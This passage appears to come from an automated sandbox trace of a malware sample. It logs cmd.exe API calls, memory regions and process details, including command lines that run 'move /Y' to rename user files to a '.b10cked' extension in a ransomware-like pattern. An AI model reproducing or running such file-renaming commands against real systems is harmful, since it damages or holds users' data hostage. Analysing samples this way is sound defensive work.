\"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" [0201.734] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.734] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.734] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.734] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.735] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.735] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.735] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.735] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.735] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.735] GetEnvironmentStringsW () returned 0x3a22d0* [0201.735] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0201.735] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.735] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.735] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.735] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.735] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.735] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.735] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.735] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.735] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.735] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.735] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef7f0, lpFilePart=0x1ef7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef7ec*="Desktop") returned 0x18 [0201.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.736] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.737] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.737] GetEnvironmentStringsW () returned 0x3a2af0* [0201.737] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0201.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.737] GetConsoleOutputCP () returned 0x1b5 [0201.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.756] GetUserDefaultLCID () returned 0x409 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef930, cchData=128 | out: lpLCData="0") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef930, cchData=128 | out: lpLCData="0") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef930, cchData=128 | out: lpLCData="1") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.759] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.759] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.760] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.770] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.770] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.771] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.771] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.771] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.771] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.771] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.771] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.771] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.771] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.774] GetConsoleTitleW (in: lpConsoleTitle=0x1ef628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.798] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.798] _wcsicmp 
(_String1="move", _String2="REN") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.798] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.798] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.798] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.798] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.800] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.800] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.800] GetVolumeInformationW (in: lpRootPathName="C:\\", 
lpVolumeNameBuffer=0x1ef3e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.801] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.801] _wcsicmp (_String1="MSSETL~1.HXN", _String2=".") returned 63 [0201.801] _wcsicmp (_String1="MSSETL~1.HXN", _String2="..") returned 63 [0201.801] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mssetl~1.hxn")) returned 0x2022 [0201.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", nBufferLength=0x104, lpBuffer=0x1eed6c, 
lpFilePart=0x1eed54 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", lpFilePart=0x1eed54*="MSSETL~1.HXN") returned 0x27 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.802] _wcsicmp (_String1="MSSETL~1.HXN", _String2=".") returned 63 [0201.802] _wcsicmp (_String1="MSSETL~1.HXN", _String2="..") returned 63 [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mssetl~1.hxn")) returned 0x2022 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", nBufferLength=0x104, lpBuffer=0x1ef1e8, lpFilePart=0x1eef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", lpFilePart=0x1eef80*="MSSETL~1.HXN") returned 0x27 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1eef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked", lpFilePart=0x1eef80*="MS.SETLANG.14.1033.hxn.b10cked") returned 0x39 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] SetLastError (dwErrCode=0x0) [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.setlang.14.1033.hxn.b10cked")) returned 0xffffffff [0201.803] GetLastError () returned 0x2 [0201.803] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x1ee8fc) returned 0x390e70 [0201.803] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x1ee8fc | out: lpFindFileData=0x1ee8fc) returned 0 [0201.803] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.804] GetLastError () returned 0x12 [0201.804] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee8fc) returned 0x390e70 [0201.804] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x1ee8fc | out: lpFindFileData=0x1ee8fc) returned 0 [0201.804] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.804] GetLastError () returned 0x12 [0201.805] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0201.805] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x3a1be0 | out: lpFindFileData=0x3a1be0) returned 0 [0201.805] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.805] GetLastError () returned 0x12 [0201.805] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0201.805] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x3a1be0 | out: lpFindFileData=0x3a1be0) returned 0 [0201.805] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.805] GetLastError () returned 0x12 [0201.805] _get_osfhandle (_FileHandle=2) returned 0xb [0201.805] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eeacc | out: lpMode=0x1eeacc) returned 1 
[0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0201.838] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.839] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb40 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.839] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eeb24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb24*=0x2c) returned 1 [0201.842] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.845] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.849] exit (_Code=1) Process: id = "477" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e40" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29356 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29357 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29358 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29359 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29360 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29361 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29362 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29363 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 29364 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 29365 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29656 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29657 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29658 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29659 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29660 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29661 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29662 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29663 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29664 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" 
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29665 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29666 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29667 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29668 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29669 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29670 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 29671 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29672 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29673 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29674 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 
